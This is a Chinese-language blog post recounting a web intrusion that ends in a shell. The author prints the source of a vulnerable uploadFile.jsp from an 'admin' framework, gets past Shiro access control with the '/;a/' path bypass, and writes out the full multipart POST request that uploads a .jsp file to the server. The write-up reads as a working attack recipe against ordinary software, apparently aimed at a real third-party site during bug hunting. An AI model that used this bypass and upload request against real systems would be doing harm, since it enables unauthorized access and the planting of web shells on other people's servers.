那些年拿過的shell之shiro許可權繞過
阿新 • • 發佈:2020-07-24
0x01 Shiro反序列化命令執行?
日常挖洞,burpsuite外掛shiro告警
用ShiroExploit的dnslog方式和靜態檔案回顯方式都沒檢測出來。tomcat的回顯也是不行。
0x02 任意檔案上傳?
這個站開啟是個登入框
抓包,發現驗證碼無效,爆破一頓以後沒爆出來。注意到
這個框架叫某admin框架,谷歌查了一下這個框架有什麼洞,發現一篇帖子。
說存在此檔案plugins/uploadify/uploadFile.jsp 且此檔案存在任意檔案上傳
<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <%@ page import="java.io.*, java.util.*, org.apache.commons.fileupload.*, java.util.*" %> <%@ page import="org.apache.commons.fileupload.disk.*, org.apache.commons.fileupload.servlet.*" %> <%! public void upload(HttpServletRequest request, HttpServletResponse response)throws ServletException, IOException { String savePath = this.getServletConfig().getServletContext().getRealPath(""); savePath = savePath + request.getParameter("uploadPath"); File f1 = new File(savePath); //這裡接收了uploadPath的值 System.out.println(request.getParameter("uploadPath")); if (!f1.exists()) { f1.mkdirs(); } DiskFileItemFactory fac = new DiskFileItemFactory(); ServletFileUpload upload = new ServletFileUpload(fac); upload.setHeaderEncoding("utf-8"); List fileList = null; try { fileList = upload.parseRequest(request); } catch (FileUploadException ex) { return; } String fileNmae = request.getParameter("fileNmae"); Iterator<FileItem> it = fileList.iterator(); String name = ""; String extName = ""; while (it.hasNext()) { FileItem item = it.next(); if (!item.isFormField()) { name = item.getName(); long size = item.getSize(); String type = item.getContentType(); //System.out.println(size + " " + type); if (name == null || name.trim().equals("")) { continue; } // 副檔名格式: if (name.lastIndexOf(".") >= 0) { extName = name.substring(name.lastIndexOf(".")); } File file = null; if(null != fileNmae && !"".equals(fileNmae)){ file = new File(savePath + fileNmae); }else{ do { if(null != fileNmae && !"".equals(fileNmae)){ file = new File(savePath + fileNmae); }else{ name = new java.text.SimpleDateFormat("yyyyMMddhhmmss").format(new Date()); //獲取當前日期 name = name + (int)(Math.random()*90000+10000); file = new File(savePath + name + extName); } } while (file.exists()); } File saveFile = new File(savePath + name + extName); try { item.write(saveFile); } catch (Exception e) { e.printStackTrace(); } } } response.getWriter().print((name.trim() + extName.trim()).trim()); } %> <% upload(request, response); %>
嘗試訪問此檔案,提示未登入302跳轉
想到這個站用了shiro雖然反序列化命令執行修了,但是最近暴的一個shiro許可權繞過肯定來不及修。具體可以看這篇文章:https://mp.weixin.qq.com/s/yb6Tb7zSTKKmBlcNVz0MBA
我們使用
/;a/plugins/uploadify/uploadFile.jsp
來繞過shiro的許可權控制,可以注意到狀態碼為200
結合之前給出的程式碼需要兩個引數構造上傳包
發現上傳成功,但是居然找不到檔案。
仔細看了一下才知道request.getParameter("uploadPath");解析不了multipart裡的引數,再次構造上傳包
POST /;a/plugins/uploadify/uploadFile.jsp?uploadPath=/plugins/uploadify/ HTTP/1.1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQDeBiVqfe6p3FMnJ ------WebKitFormBoundaryQDeBiVqfe6p3FMnJ Content-Disposition: form-data; name="imgFile"; filename="2204249.jsp" Content-Type: image/jpeg test ------WebKitFormBoundaryQDeBiVqfe6p3FMnJ--
成功shell